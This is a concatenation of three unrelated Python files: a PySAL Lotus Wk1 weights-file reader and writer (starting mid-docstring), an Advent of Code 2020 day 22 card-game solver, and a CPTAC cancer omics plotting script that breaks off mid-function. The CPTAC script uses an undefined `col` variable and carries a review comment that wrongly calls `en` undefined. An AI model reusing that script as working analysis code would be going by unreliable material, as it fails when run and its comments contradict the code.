    |             |                     |                         |       |          ==else: unknown    |
    | [DLEN]      |Length of cell data  |unsigned short           |2      |                             |
    | [DFORMAT]   |Format of cell data  |not sure                 |1      |                             |
    | [CINDEX]    |Row, column of cell  |unsigned short           |4      |                             |
    | [CVALUE]    |Value of cell        |double, [DTYPE][0]==14   |8      |                             |
    |             |                     |formula,[DTYPE][0]==16   |8 +    |[DTYPE][1] - 13              |
    |             |                     |integer,[DTYPE][0]==13   |2      |                             |
    |             |                     |nrange, [DTYPE][0]==11   |24     |                             |
    |             |                     |else, [DTYPE][0]==else   |       |[DTYPE][1]                   |
    | [EOF]       |End of file          |unsigned short           |4      |1,0,0,0                      |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    """

    FORMATS = ['wk1']
    MODES = ['r', 'w']

    def __init__(self, *args, **kwargs):
        """Open the underlying file in binary mode; FileIO.__init__ sets
        self.dataPath and self.mode from the positional/keyword arguments."""
        self._varName = 'Unknown'
        fileio.FileIO.__init__(self, *args, **kwargs)
        self.file = open(self.dataPath, self.mode + 'b')

    def _set_varName(self, val):
        # Only string values are accepted; anything else is silently ignored.
        if issubclass(type(val), str):
            self._varName = val

    def _get_varName(self):
        return self._varName

    # Informational name for the weights variable.
    varName = property(fget=_get_varName, fset=_set_varName)

    def read(self, n=-1):
        """Read the file into a W object.  `n` is accepted for interface
        compatibility but ignored: a Wk1 file holds exactly one matrix."""
        self._complain_ifclosed(self.closed)
        return self._read()

    def seek(self, pos):
        # Only rewinding to the start of the file is supported.
        if pos == 0:
            self.file.seek(0)
            self.pos = 0

    def _read(self):
        """
        Reads Lotus Wk1 file

        Returns
        -------
        A pysal.weights.weights.W object

        Examples
        --------

        Type 'dir(w)' at the interpreter to see what methods are supported.
        Open a Lotus Wk1 file and read it into a pysal weights object

        >>> import pysal.lib
        >>> w = pysal.lib.io.open(pysal.lib.examples.get_path('spat-sym-us.wk1'),'r').read()

        Get the number of observations from the header

        >>> w.n
        46

        Get neighbor distances for a single observation

        >>> w[1] == dict({25: 1.0, 3: 1.0, 28: 1.0, 39: 1.0})
        True
        """
        # One matrix per file: a second read attempt ends iteration.
        if self.pos > 0:
            raise StopIteration
        # [BOF] sanity check -- see the class docstring table.
        bof = struct.unpack('<6B', self.file.read(6))
        if bof != (0, 0, 2, 0, 6, 4):
            raise ValueError('The header of your file is wrong!')
        neighbors = {}
        weights = {}
        # Every record starts with a 2-byte type and a 2-byte payload length.
        dtype, dlen = struct.unpack('<2H', self.file.read(4))
        while(dtype != 1):  # record type 1 == [EOF]
            if dtype in [13, 14, 16]:  # integer, number, or formula cell
                self.file.read(1)  # skip the 1-byte cell format [DFORMAT]
                # NOTE(review): no '<' byte-order prefix here, unlike every
                # other unpack in this class -- relies on a little-endian
                # host; confirm intentional.
                row, column = struct.unpack('2H', self.file.read(4))
                format, length = '<d', 8
                if dtype == 13:  # integer cells store a 2-byte short
                    format, length = '<h', 2
                value = float(struct.unpack(format, self.file.read(length))[0])
                if value > 0:
                    # Non-zero cell: column is a neighbor of row with this weight.
                    ngh = neighbors.setdefault(row, [])
                    ngh.append(column)
                    wgt = weights.setdefault(row, [])
                    wgt.append(value)
                if dtype == 16:
                    # Skip the formula body that follows a formula cell.
                    self.file.read(dlen - 13)
            elif dtype == 11:
                # nrange record: fixed 24-byte payload.
                self.file.read(24)
            else:
                # Unknown / unneeded record: skip its payload entirely.
                self.file.read(dlen)
            dtype, dlen = struct.unpack('<2H', self.file.read(4))
        self.pos += 1
        return W(neighbors, weights)

    def write(self, obj):
        """

        Parameters
        ----------
        .write(weightsObject)
        accepts a weights object

        Returns
        ------

        a Lotus wk1 file
        write a weights object to the opened wk1 file.

        Examples
        --------

        >>> import tempfile, pysal.lib, os
        >>> testfile = pysal.lib.io.open(pysal.lib.examples.get_path('spat-sym-us.wk1'),'r')
        >>> w = testfile.read()

        Create a temporary file for this example

        >>> f = tempfile.NamedTemporaryFile(suffix='.wk1')

        Reassign to new var

        >>> fname = f.name

        Close the temporary named file

        >>> f.close()

        Open the new file in write mode

        >>> o = pysal.lib.io.open(fname,'w')

        Write the Weights object into the open file

        >>> o.write(w)
        >>> o.close()

        Read in the newly created text file

        >>> wnew = pysal.lib.io.open(fname,'r').read()

        Compare values from old to new

        >>> wnew.pct_nonzero == w.pct_nonzero
        True

        Clean up temporary file created for this example

        >>> os.remove(fname)
        """
        self._complain_ifclosed(self.closed)
        if issubclass(type(obj), W):
            f = self.file
            n = obj.n
            # The Wk1 layout caps the matrix at 256 columns.
            if n > 256:
                raise ValueError('WK1 file format supports only up to 256 observations.')
            pack = struct.pack
            # Header records: [BOF][DIM][CPI][CAL][CMODE][CORD][SPLIT][SYNC]
            # [CURS][WIN][HCOL][MRG][LBL] -- values per the docstring table.
            f.write(pack('<6B', 0, 0, 2, 0, 6, 4))
            f.write(pack('<6H', 6, 8, 0, 0, n, n))
            f.write(pack('<2H6B', 150, 6, 0, 0, 0, 0, 0, 0))
            f.write(pack('<2H1B', 47, 1, 0))
            f.write(pack('<2H1b', 2, 1, 0))
            f.write(pack('<2H1b', 3, 1, 0))
            f.write(pack('<2H1b', 4, 1, 0))
            f.write(pack('<2H1b', 5, 1, 0))
            f.write(pack('<2H1b', 49, 1, 1))
            f.write(pack('<4H2b13H', 7, 32, 0, 0, 113, 0, 10,
                         n, n, 0, 0, 0, 0, 0, 0, 0, 0, 72, 0))
            hidcol = tuple(['<2H32b', 100, 32] + [0] * 32)
            f.write(pack(*hidcol))
            f.write(pack('<7H', 40, 10, 4, 76, 66, 2, 2))
            f.write(pack('<2H1c', 41, 1, "'".encode()))
            id2i = obj.id2i
            # One [CELL] record per matrix entry, row-major, zeros included.
            for i, w_i in enumerate(obj):
                row = [0.0] * n
                for k in w_i[1]:
                    row[id2i[k]] = w_i[1][k]
                for c, v in enumerate(row):
                    cell = tuple(['<2H1b2H1d', 14, 13, 113, i, c, v])
                    f.write(pack(*cell))
            f.write(pack('<4B', 1, 0, 0, 0))  # [EOF]
            self.pos += 1
        else:
            raise TypeError("Expected a pysal weights object, got: %s" % (
                type(obj)))

    def close(self):
        # Close the binary file, then let the base class finish up.
        self.file.close()
        fileio.FileIO.close(self)
|
import fileinput
from collections import deque
def parse(lines):
    """Parse the two Combat decks (AoC 2020 day 22 input format).

    Expects 'Player 1:' followed by one card per line, a blank separator,
    then 'Player 2:' and its cards.  Returns (deck1, deck2) as deques with
    the top card at the left.  Blank lines in the second deck (e.g. a
    trailing newline) are skipped -- the original crashed on int('') there.
    """
    it = iter(lines)
    assert next(it).rstrip() == 'Player 1:'
    deck1 = deque()
    # The walrus loop consumes up to and including the blank separator.
    while (line := next(it)).rstrip():
        deck1.append(int(line))
    assert next(it).rstrip() == 'Player 2:'
    deck2 = deque()
    for line in it:
        if line.strip():
            deck2.append(int(line))
    return deck1, deck2
def part1(lines):
    """Play regular Combat and return the winning player's score."""
    deck_a, deck_b = parse(lines)
    while deck_a and deck_b:
        top_a = deck_a.popleft()
        top_b = deck_b.popleft()
        # Higher card wins the round and takes both, winner's card first.
        if top_a > top_b:
            deck_a.extend((top_a, top_b))
        else:
            deck_b.extend((top_b, top_a))
    winner = deck_a or deck_b
    # Score: bottom card counts 1, next 2, ... top card counts len(winner).
    return sum(place * card for place, card in zip(range(len(winner), 0, -1), winner))
def part2(lines):
    """Play Recursive Combat and return the winning player's score."""
    deck1, deck2 = parse(lines)
    go(deck1, deck2)
    winner = deck1 if deck1 else deck2
    return sum(place * card for place, card in zip(range(len(winner), 0, -1), winner))
def go(deck1, deck2):
    """Play a game of Recursive Combat in place.

    Returns True when player 2 wins the game, False when player 1 does.
    The repeated-state rule awards the game to player 1.
    """
    seen = set()
    while deck1 and deck2:
        state = (tuple(deck1), tuple(deck2))
        if state in seen:
            # Infinite-game prevention: player 1 wins immediately.
            return False
        seen.add(state)
        c1 = deck1.popleft()
        c2 = deck2.popleft()
        if len(deck1) >= c1 and len(deck2) >= c2:
            # Both players have enough cards: a sub-game decides the round.
            player2_wins_round = go(deque(list(deck1)[:c1]), deque(list(deck2)[:c2]))
        else:
            player2_wins_round = c1 < c2
        if player2_wins_round:
            deck2.append(c2)
            deck2.append(c1)
        else:
            deck1.append(c1)
            deck1.append(c2)
    return not deck1
# Both solvers, e.g. for a generic puzzle runner.
parts = (part1, part2)

if __name__ == '__main__':
    # Read the puzzle input from file arguments (or stdin) and print both answers.
    lines = list(fileinput.input())
    print(part1(lines))
    print(part2(lines))
|
import cptac
import math
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats
import seaborn as sns
import statsmodels.stats.multitest
from statannot import add_stat_annotation
from scipy.stats import pearsonr
def downloadCptac():
    """Download (and locally cache) the CPTAC datasets used below.

    NOTE(review): the 'luad' and 'brca' downloads are commented out even
    though cptac.Luad() and cptac.Brca() are instantiated later -- confirm
    those datasets are already cached, or re-enable the downloads.
    """
    # To view available datasets, enter 'cptac.list_data()'.
    cptac.list_datasets()
    cptac.download(dataset = "endometrial")
    cptac.download(dataset = 'colon')
    cptac.download(dataset = 'ovarian')
    cptac.download(dataset = 'RenalCcrcc')
    #cptac.download(dataset ='luad')
    #cptac.download(dataset ='brca')

downloadCptac()
# Instantiate one dataset object per cancer type.
endometrialData = cptac.Endometrial()
colorectalData = cptac.Colon()
ovarianData = cptac.Ovarian()
renalData = cptac.RenalCcrcc()
lungData = cptac.Luad()
breastData = cptac.Brca()
# Later sections refer to the endometrial dataset as `en`; without this
# alias every `en.*` call below raises NameError.
en = endometrialData
def listDataForEachCancer():
    """Print the available data tables for each loaded cancer dataset."""
    labeled_datasets = (
        ("endometrial", endometrialData),
        ("\n\ncolorectal", colorectalData),
        ("\n\novarian", ovarianData),
        ("\n\nrenal", renalData),
    )
    for label, dataset in labeled_datasets:
        print(label)
        dataset.list_data()

listDataForEachCancer()
#################################################################
# Correlation: Proteomics vs Transcriptom in Endometrial Cancer #
#################################################################
def correlationPlot(dataSet, label, omics1, omics2, gene1, gene2):
    """Regression scatter plot of one omics measurement against another.

    Joins gene1's omics1 column with gene2's omics2 column for dataSet,
    drops missing rows, and annotates the plot with the Pearson r and
    p-value (rounded to 2 decimals).
    """
    merged = dataSet.join_omics_to_omics(df1_name = omics1,
                                         df2_name = omics2,
                                         genes1 = gene1,
                                         genes2 = gene2)
    print(merged.head())
    merged = merged.dropna()
    r, p = (np.round(c, 2) for c in pearsonr(merged.iloc[:, 0], merged.iloc[:, 1]))
    print([r, p])
    sns.set(style ="white", font_scale = 1.5)
    plot = sns.regplot(x = merged.columns[0], y = merged.columns[1], data = merged)
    # Place the annotation near the top-left corner of the axes.
    x_lo, x_hi = plot.get_xlim()
    y_lo, y_hi = plot.get_ylim()
    annotation = 'r=%s, p=%s' % (r, p)
    plot.text(x_lo + (x_hi - x_lo) * 0.010, y_lo + (y_hi - y_lo) * 0.95,
              annotation, fontsize = 12)
    plot.set(xlabel = gene1 + ' ' + omics1,
             ylabel = gene2 + ' ' + omics2,
             title = '{} vs {} ({})'.format(gene1, gene2, label))
    plt.show()
# Protein abundance vs mRNA abundance: EIF4A1 against VEGFA.
correlationPlot(dataSet = endometrialData,
                label = "Endometrial Cancer",
                omics1 = "proteomics",
                omics2 = "transcriptomics",
                gene1 = "EIF4A1",
                gene2 = "VEGFA")
# Gene-level phosphorylation vs its own transcript for EIF4G1.
correlationPlot(dataSet = endometrialData,
                label = "Endometrial Cancer",
                omics1 = "phosphoproteomics_gene",
                omics2 = "transcriptomics",
                gene1 = "EIF4G1",
                gene2 = "EIF4G1")
# Gene-level phosphorylation vs protein abundance for EIF4A1.
correlationPlot(dataSet = endometrialData,
                label = "Endometrial Cancer",
                omics1 = "phosphoproteomics_gene",
                omics2 = "proteomics",
                gene1 = "EIF4A1",
                gene2 = "EIF4A1")
# Protein vs protein: EIF4G1 against EIF4A1 in the colorectal cohort.
correlationPlot(dataSet = colorectalData,
                label = "Colorectal Cancer",
                omics1 = "proteomics",
                omics2 = "proteomics",
                gene1 = "EIF4G1",
                gene2 = "EIF4A1")
# The ovarian join can fail (e.g. missing tables); report and keep going.
try:
    correlationPlot(dataSet = ovarianData,
                    label = "Ovarian Cancer",
                    omics1 = "proteomics",
                    omics2 = "transcriptomics",
                    gene1 = "EIF4G1",
                    gene2 = "EIF4G1")
except Exception as ex:
    print('Could not make correlation plot for Ovarian Cancer: ' + str(ex))
######################################################################
# Correlation: Phosphoproteomics vs Proteomics in Endometrial Cancer #
######################################################################
## correlation between 4EBP1-T37 and 4EBP1 protein in endometrial cancer
def siteSpecificCorrelationPlot(dataSet, gene1, gene2, site,
                                phospho_site='EIF4EBP1-T37_phosphoproteomics'):
    """Correlate a single phosphosite column against a protein-level column.

    Parameters
    ----------
    dataSet : cptac dataset
    gene1, gene2 : str
        Genes whose phosphoproteomics/proteomics columns are joined.
    site : str
        Protein-level column plotted on the y-axis.
    phospho_site : str
        Phosphosite column plotted on the x-axis.  Generalized from the
        hard-coded EIF4EBP1-T37 column; the default keeps every existing
        caller's behavior unchanged.
    """
    merged = dataSet.join_omics_to_omics(
        df1_name = "phosphoproteomics",
        df2_name = "proteomics",
        genes1 = gene1,
        genes2 = gene2)
    print(merged.columns)
    # Keep only samples that actually have the phosphosite measurement.
    merged = merged.dropna(subset = [phospho_site])
    print(merged.head())
    corr = pearsonr(merged[phospho_site], merged[site])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style ="white",
            font_scale = 1.5)
    plot = sns.regplot(x = merged[phospho_site],
                       y = merged[site],
                       data = merged)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    # For the default site this reproduces the original fixed x-label.
    plot.set(xlabel = phospho_site.replace('_', ' '),
             ylabel = site,
             title = 'Phosphoproteomics vs Proteomics (Endometrial Cancer)')
    plt.show()
# 4EBP1-T37 phosphosite vs total 4EBP1 protein in endometrial cancer.
siteSpecificCorrelationPlot(dataSet = endometrialData,
                            gene1 = "EIF4EBP1",
                            gene2 = "EIF4EBP1",
                            site = "EIF4EBP1_proteomics")
# (A commented-out module-level duplicate of this analysis, encorrelationplot(),
# was removed here: siteSpecificCorrelationPlot produces the same plot.)
# 4EBP1-T37 phosphosite vs EIF4A1 protein in endometrial cancer.
siteSpecificCorrelationPlot(dataSet = endometrialData,
                            gene1 = "EIF4EBP1",
                            gene2 = "EIF4A1",
                            site = "EIF4A1_proteomics")
#########################################################################
# Association: Clinical Variables with Proteomics in Endometrial Cancer #
#########################################################################
## load the dataframe for clinical results by calling the en.get_clinical() method
# NOTE(review): `en` is not defined anywhere above in this file -- it
# presumably should alias the endometrial dataset (endometrialData); as
# written this line raises NameError.  Confirm and define the alias.
en_clinical_data = en.get_clinical()
print(en_clinical_data.columns)
## Clinical Variables with Proteomics
def en_pro_cli_plot(gene):
    """Box/strip plot of a gene's protein abundance across tumor stages in
    the endometrial cohort, with t-test annotations against Normal."""
    merged = en.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "proteomics",
        metadata_cols = "tumor_Stage-Pathological",
        omics_genes = gene)
    # Samples without a pathological stage are the normal samples.
    merged["tumor_Stage-Pathological"] = merged["tumor_Stage-Pathological"].fillna("Normal")
    merged.head()
    ## Show possible variations of Histologic_type
    merged["tumor_Stage-Pathological"].unique()
    column = gene + '_proteomics'
    order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
    sns.set(style ="white", font_scale = 1.5)
    ax = sns.boxplot(x = "tumor_Stage-Pathological", y = column,
                     data = merged, showfliers = False, order = order)
    sns.stripplot(x = "tumor_Stage-Pathological", y = column,
                  data = merged, color = '.3', order = order)
    add_stat_annotation(ax,
                        data = merged,
                        x = "tumor_Stage-Pathological",
                        y = column,
                        order = order,
                        boxPairList = [("Normal", stage) for stage in order[1:]],
                        test = 't-test_ind',
                        textFormat = 'star',
                        loc = 'inside',
                        verbose = 2)
    plt.title('endometrial cancer')

en_pro_cli_plot(gene = "EIF4E")
## Clinical Variables with phosphoproteomics
def en_phos_cli_plot(gene):
    """Plot tumor-stage box/strip plots for every phosphosite of *gene*.

    One figure is produced per phosphoproteomics column matching *gene*.
    Sites whose plotting/annotation raises a ValueError (e.g. a stage group
    with too few observations) are skipped.
    """
    en_clinical_and_proteomics = en.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "phosphoproteomics",
        metadata_cols = "tumor_Stage-Pathological",
        omics_genes = gene)
    # Samples without a pathological stage are the normal samples.
    en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
    en_clinical_and_proteomics.head()
    ## Show possible variations of Histologic_type
    en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
    PhosphoSite = list(en_clinical_and_proteomics.filter(like= gene).columns.values.tolist())
    for i in PhosphoSite:
        print(i)
        try:
            # Re-join so each site starts from the full sample set before
            # dropping its own missing values.
            en_clinical_and_proteomics = en.join_metadata_to_omics(
                metadata_df_name = "clinical",
                omics_df_name = "phosphoproteomics",
                metadata_cols = "tumor_Stage-Pathological",
                omics_genes = gene)
            en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
            en_clinical_and_proteomics = en_clinical_and_proteomics.dropna(subset = [i])
            plt.figure()
            sns.set(style ="white",
                    font_scale = 1.5)
            order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
            ax = sns.boxplot(x = "tumor_Stage-Pathological",
                             y = i,
                             data = en_clinical_and_proteomics,
                             showfliers = False,
                             order = order)
            sns.stripplot(x = "tumor_Stage-Pathological",
                          y = i,
                          data = en_clinical_and_proteomics,
                          color = '.3',
                          order = order)
            add_stat_annotation(ax,
                                data = en_clinical_and_proteomics,
                                x = "tumor_Stage-Pathological",
                                y = i,
                                order = order,
                                boxPairList = [("Normal", "Stage I"),
                                               ("Normal", "Stage II"),
                                               ("Normal", "Stage III"),
                                               ("Normal", "Stage IV")],
                                test = 't-test_ind',
                                textFormat = 'star',
                                loc = 'inside',
                                verbose = 2)
            plt.title('endometrial cancer')
        except ValueError:
            # Fixed: the original read 'except: ValueError' + 'pass' -- a
            # bare except that evaluated ValueError as a no-op expression
            # and silently swallowed *every* exception.
            pass

en_phos_cli_plot(gene = "PIK3CA")
## Clinical Variables with phosphoproteomics total
# NOTE(review): this redefines en_phos_cli_plot -- the site-level version
# defined earlier has already been called by this point, so only later calls
# get this gene-level variant.  Confirm the shadowing is intentional; a
# distinct name would be clearer if both are needed.
def en_phos_cli_plot(gene):
    """Plot tumor-stage box/strip plots for gene-level (total)
    phosphorylation of *gene* in the endometrial cohort."""
    en_clinical_and_proteomics = en.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "phosphoproteomics_gene",
        metadata_cols = "tumor_Stage-Pathological",
        omics_genes = gene)
    # Samples without a pathological stage are the normal samples.
    en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
    en_clinical_and_proteomics.head()
    ## Show possible variations of Histologic_type
    en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
    PhosphoSite = list(en_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in PhosphoSite:
        print(i)
        # Note: drops rows cumulatively across sites (no re-join here).
        en_clinical_and_proteomics = en_clinical_and_proteomics.dropna(subset = [i])
        plt.figure()
        sns.set(style ="white",
                font_scale = 1.5)
        order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
        ax = sns.boxplot(x = "tumor_Stage-Pathological",
                         y = i,
                         data = en_clinical_and_proteomics,
                         showfliers = False,
                         order = order)
        sns.stripplot(x = "tumor_Stage-Pathological",
                      y = i,
                      data = en_clinical_and_proteomics,
                      color = '.3',
                      order = order)
        add_stat_annotation(ax,
                            data = en_clinical_and_proteomics,
                            x = "tumor_Stage-Pathological",
                            y = i,
                            order = order,
                            boxPairList = [("Normal", "Stage I"),
                                           ("Normal", "Stage II"),
                                           ("Normal", "Stage III"),
                                           ("Normal", "Stage IV")],
                            test = 't-test_ind',
                            textFormat = 'star',
                            loc = 'inside',
                            verbose = 2)
    plt.title('endometrial cancer')

en_phos_cli_plot(gene = "EIF4EBP1")
## Clinical Variables with transcriptomics
def en_trans_cli_plot(gene):
    """Box/strip plot of a gene's transcript abundance across tumor stages
    in the endometrial cohort, with t-test annotations against Normal."""
    merged = en.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "transcriptomics",
        metadata_cols = "tumor_Stage-Pathological",
        omics_genes = gene)
    # Samples without a pathological stage are the normal samples.
    merged["tumor_Stage-Pathological"] = merged["tumor_Stage-Pathological"].fillna("Normal")
    merged.head()
    ## Show possible variations of Histologic_type
    merged["tumor_Stage-Pathological"].unique()
    column = gene + '_transcriptomics'
    order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
    sns.set(style ="white", font_scale = 1.5)
    ax = sns.boxplot(x = "tumor_Stage-Pathological", y = column,
                     data = merged, showfliers = False, order = order)
    sns.stripplot(x = "tumor_Stage-Pathological", y = column,
                  data = merged, color = '.3', order = order)
    add_stat_annotation(ax,
                        data = merged,
                        x = "tumor_Stage-Pathological",
                        y = column,
                        order = order,
                        boxPairList = [("Normal", stage) for stage in order[1:]],
                        test = 't-test_ind',
                        textFormat = 'star',
                        loc = 'inside',
                        verbose = 2)
    plt.title('endometrial cancer')

en_trans_cli_plot(gene = "EIF4E")
## Merge clinical attribute with transcriptomics dataframe (tumor vs normal)
def en_trans_cli_plot(gene):
    """Box/strip plot of *gene* transcriptomics, tumor vs adjacent normal (endometrial).

    NOTE(review): redefines en_trans_cli_plot from above; this version groups
    by Proteomics_Tumor_Normal instead of tumor stage.
    """
    en_clinical_and_proteomics = en.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "transcriptomics",
        metadata_cols = "Proteomics_Tumor_Normal",
        omics_genes = gene)
    en_clinical_and_proteomics.head()
    ## Show possible variations of the tumor/normal attribute
    en_clinical_and_proteomics["Proteomics_Tumor_Normal"].unique()
    sns.set(style ="white",
            font_scale = 1.5)
    # Boxes without fliers; raw samples overlaid by the stripplot.
    ax = sns.boxplot(x = "Proteomics_Tumor_Normal",
                     y = gene + '_transcriptomics',
                     data = en_clinical_and_proteomics,
                     showfliers = False)
    sns.stripplot(x = "Proteomics_Tumor_Normal",
                  y = gene + '_transcriptomics',
                  data = en_clinical_and_proteomics,
                  color = '.3')
    # Star-annotated tumor-vs-normal independent t-test.
    add_stat_annotation(ax,
                        data = en_clinical_and_proteomics,
                        x = "Proteomics_Tumor_Normal",
                        y = gene + '_transcriptomics',
                        boxPairList = [("Tumor", "Adjacent_normal")],
                        test = 't-test_ind',
                        textFormat = 'star',
                        loc = 'inside',
                        verbose = 2)
    plt.title('endometrial cancer')
en_trans_cli_plot(gene = "EIF4E")
###################################################################
## Associating Clinical Variables with proteomics in colon cancer##
###################################################################
### load the dataframe for clinical results by calling the col.get_clinical() method
col_clinical_data = col.get_clinical()
print(col_clinical_data.columns)
## Choose Clinical Attribute and Merge Dataframes
col_clinical_attribute = "Stage"
## Merge clinical attribute with proteomics dataframe
## (plot helper defined below; called with gene = "EIF4E")
def col_pro_cli_plot(gene):
    """Box/strip plot of *gene* proteomics across tumor stages (colon cancer)."""
    stage_col = "Stage"
    y_col = gene + '_proteomics'
    # Join the clinical stage onto the proteomics values for this gene.
    merged = col.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "proteomics",
        metadata_cols = stage_col,
        omics_genes = gene)
    # Unstaged samples are normal tissue.
    merged[stage_col] = merged[stage_col].fillna("Normal")
    merged.head()
    ## Show possible variations of the stage attribute
    merged[stage_col].unique()
    sns.set(style ="white", font_scale = 1.5)
    stage_order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
    # Boxes without fliers; individual samples overlaid as dark points.
    ax = sns.boxplot(x = stage_col, y = y_col, data = merged,
                     showfliers = False, order = stage_order)
    ax = sns.stripplot(x = stage_col, y = y_col, data = merged,
                       color = '.3', order = stage_order)
    # Star-annotated Normal-vs-each-stage independent t-tests.
    add_stat_annotation(ax, data = merged, x = stage_col, y = y_col,
                        order = stage_order,
                        boxPairList = [("Normal", s) for s in stage_order[1:]],
                        test = 't-test_ind', textFormat = 'star',
                        loc = 'inside', verbose = 2)
    plt.title('colon cancer')
col_pro_cli_plot(gene = "EIF4E")
###########################################################################
## Associating Clinical Variables with Phosphoproteomics in colon cancer ##
###########################################################################
def col_pho_cliplot(gene):
    """Plot each phosphosite matching *gene* against tumor stage (colon cancer).

    Fixed: the per-site loop ended with ``except: ValueError`` -- a *bare*
    except whose body merely evaluated the ValueError class -- so every
    exception (including typos and KeyboardInterrupt) was silently swallowed.
    It now catches only ValueError, the originally intended case (e.g. an
    annotation failing when a stage level has no samples).

    NOTE(review): the joins pass no omics_genes filter, so the entire
    phosphoproteomics table is merged each time -- confirm whether
    omics_genes = gene was intended.
    """
    col_clinical_and_proteomics = col.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "phosphoproteomics",
        metadata_cols = "Stage")
    # Samples without a recorded stage are normal tissue.
    col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
    col_clinical_and_proteomics.head()
    ## Show possible variations of the stage attribute
    col_clinical_and_proteomics["Stage"].unique()
    PhosphoSite = list(col_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in PhosphoSite:
        try:
            print(i)
            # Re-join for each site so every plot starts from the full sample set.
            col_clinical_and_proteomics = col.join_metadata_to_omics(
                metadata_df_name = "clinical",
                omics_df_name = "phosphoproteomics",
                metadata_cols = "Stage")
            col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
            col_clinical_and_proteomics = col_clinical_and_proteomics.dropna(subset = [i])
            plt.figure()
            sns.set(style ="white",
                    font_scale = 1.5)
            order = ["Normal",
                     "Stage I",
                     "Stage II",
                     "Stage III",
                     "Stage IV"]
            ax = sns.boxplot(x = "Stage",
                             y = i,
                             data = col_clinical_and_proteomics,
                             showfliers = False,
                             order = order)
            sns.stripplot(x = "Stage",
                          y = i,
                          data = col_clinical_and_proteomics,
                          color = '.3',
                          order = order)
            add_stat_annotation(ax,
                                data = col_clinical_and_proteomics,
                                x = "Stage",
                                y = i,
                                order = order,
                                boxPairList = [("Normal", "Stage I"),
                                               ("Normal", "Stage II"),
                                               ("Normal", "Stage III"),
                                               ("Normal", "Stage IV")],
                                test = 't-test_ind',
                                textFormat = 'star',
                                loc = 'inside',
                                verbose = 2)
            plt.title('colon cancer')
        except ValueError:
            pass
col_pho_cliplot(gene = "MKNK2_")
#########################################################################
## Associating Clinical Variables with Transcriptomics in colon cancer ##
#########################################################################
def col_tra_cli_plot(gene):
    """Box/strip plot of *gene* transcriptomics across tumor stages (colon).

    NOTE(review): this function is redefined immediately below with a
    stage-only comparison (no "Normal" group); this first version is used
    for the "MKNK1" call, the later one for "EIF4E".
    """
    col_clinical_and_proteomics = col.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "transcriptomics",
        metadata_cols = "Stage",
        omics_genes = gene)
    # Samples without a recorded stage are normal tissue.
    col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
    col_clinical_and_proteomics.head()
    ## Show possible variations of the stage attribute
    col_clinical_and_proteomics["Stage"].unique()
    sns.set(style ="white",
            font_scale = 1.5)
    order = ["Normal",
             "Stage I",
             "Stage II",
             "Stage III",
             "Stage IV"]
    ax = sns.boxplot(x = "Stage",
                     y = gene + '_transcriptomics',
                     data = col_clinical_and_proteomics,
                     showfliers = False,
                     order = order)
    ax = sns.stripplot(x = "Stage",
                       y = gene + '_transcriptomics',
                       data = col_clinical_and_proteomics,
                       color = '.3',
                       order = order)
    # Star-annotated Normal-vs-each-stage independent t-tests.
    add_stat_annotation(ax,
                        data = col_clinical_and_proteomics,
                        x = "Stage",
                        y = gene + '_transcriptomics',
                        order = order,
                        boxPairList = [("Normal", "Stage I"),
                                       ("Normal", "Stage II"),
                                       ("Normal", "Stage III"),
                                       ("Normal", "Stage IV")],
                        test = 't-test_ind',
                        textFormat = 'star',
                        loc = 'inside',
                        verbose = 2)
    plt.title('colon cancer')
col_tra_cli_plot(gene = "MKNK1")
def col_tra_cli_plot(gene):
    """Redefinition: *gene* transcriptomics compared across stages I-IV only (colon).

    Unlike the version above, "Normal" is excluded from the plotted order and
    stages II-IV are each tested against Stage I.  Rows relabelled "Normal"
    by fillna are therefore dropped by the `order` filter at plot time.
    """
    col_clinical_and_proteomics = col.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "transcriptomics",
        metadata_cols = "Stage",
        omics_genes = gene)
    col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
    col_clinical_and_proteomics.head()
    ## Show possible variations of the stage attribute
    col_clinical_and_proteomics["Stage"].unique()
    sns.set(style ="white",
            font_scale = 1.5)
    order = ["Stage I",
             "Stage II",
             "Stage III",
             "Stage IV"]
    ax = sns.boxplot(x = "Stage",
                     y = gene + '_transcriptomics',
                     data = col_clinical_and_proteomics,
                     showfliers = False,
                     order = order)
    sns.stripplot(x = "Stage",
                  y = gene + '_transcriptomics',
                  data = col_clinical_and_proteomics,
                  color = '.3',
                  order = order)
